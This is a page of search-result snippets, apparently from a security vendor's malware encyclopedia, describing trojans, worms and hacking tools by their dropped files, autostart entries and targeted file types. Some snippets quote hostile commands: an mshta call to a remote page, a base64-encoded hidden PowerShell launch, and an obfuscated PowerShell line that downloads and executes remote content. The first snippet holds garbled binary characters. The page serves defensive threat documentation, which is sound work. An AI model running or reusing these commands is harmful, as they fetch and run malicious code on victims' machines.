Keyword: h
5918 Total Search   |   Showing Results : 1 - 20
   Next  
\Common Files\System\_CHAR(0x12)_°!ö %Program Files%\Common Files\Microsoft Shared\h®_CHAR(0x16)_¨XÇfÌø¬Ù2Ķ_CHAR(0x19)__CHAR(0x1A)_ëiÚwW_CHAR(0x19)__CHAR(0x1B)_Hÿwÿø«_CHAR(0x01)_áµÿ¿yèäØ_CHAR(0x1D)__CHAR
winlogons.exe c\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This Trojan
winlogons.exe c\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This Trojan
winlogons.exe c\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This Trojan
%Program Files%\H\svchost.bin (Note: %Program Files% is the default Program Files folder, usually C:\Program Files.) It creates the following folders: %Program Files%\H (Note: %Program Files% is the default
winlogons.exe c\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This Trojan
\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This worm modifies the
\svchost1.exe d\svchost2.exe e\svchost3.exe f\svchost4.exe g\svchost5.exe h\svchost6.exe wins\svchost.exe It creates the following folders: c d e f g h wins WinAxA Autostart Technique This worm modifies the
network shares and drop a copy of the said worm as N73.Image12.03.2009.JPG.scr Drops copy of the said worm in drives C to H in the following folders: New folder, music, print Drops files
(64-bit) and 10(64-bit).) It adds the following processes: cmd /c ""{Malware Directory}\{Malware File Name}.bat" h" → if executed without “h” argument RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
y = R E C Y C L E R \{random}. e x e s h e l l \ O p e n \ C o m m a n d = R E C Y C L E R \{random}. e x e s h e l l \ O p e n \ D e f a u l t = 1 s h e l l \ E x p l o r e \ c o m m a n d = R E C Y
file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Installation This Trojan adds the following processes: powershell -w h -e {base64 encoded
UDP network connections. It displays the following DOS command console when executed with h argument: Depending on the intentions of the malicious user, the effects of this hacking tool may vary. This
be used to read and write data across TCP or UDP network connections. It displays the following DOS command console when executed with h argument: Depending on the intentions of the malicious user, the
following processes: cmd /c m^sh^t^a h^tt^p^:/^/{BLOCKED}.{BLOCKED}.86.178/pp/aa.html mshta http://{BLOCKED}.{BLOCKED}.86.178/pp/aa.html Other Details However, as of this writing, the said sites are
) It creates the following folders: %System%\bycool1 %System%\bycool %System%\f %System%\f\d %System%\f\d\e %System%\f\d\e\d %System%\f\d\e\d\h %System%\f\d\e\d\h\Administrator_18_02_2012_17_22_42
variable "h" . Trojan.Generic.dkxdo(Jiangmin); ASP/Webshell(AhnLab-V3); Dropped by other malware, Downloaded from the Internet, Hosted on site and run when accessed Executes commands
extensions: 1cd 3gp H* X* avi bmp cad cer chm dbf doc docx dwg flv gz h* htm html ifo jpeg jpg ls m2v max md mdb mdf mov mp3 mpeg mpg odt p12 pdf pfx php php4 php5 png ppt pptx rar rtf tar txt vob xls xlsx xlt
Trojan adds the following processes: "%System%\WindowsPowerShell\v1.0\powershell.exe" -w h $((irm px13.blogspot.com////////////////atom.xml) | .('{1}{0}'-f'dasdwdwd','I').replace('dasdwdwd','ex'))
Banner Scanner g - Ping/Name/SQL/IPC Scanner h - Help Info m - Command Line SendMail o - Show Other Function p - Packet Transmit s - Socks5 Proxy u - Like UNIX su Tool -x Sniffer 12 for 2012: What Will The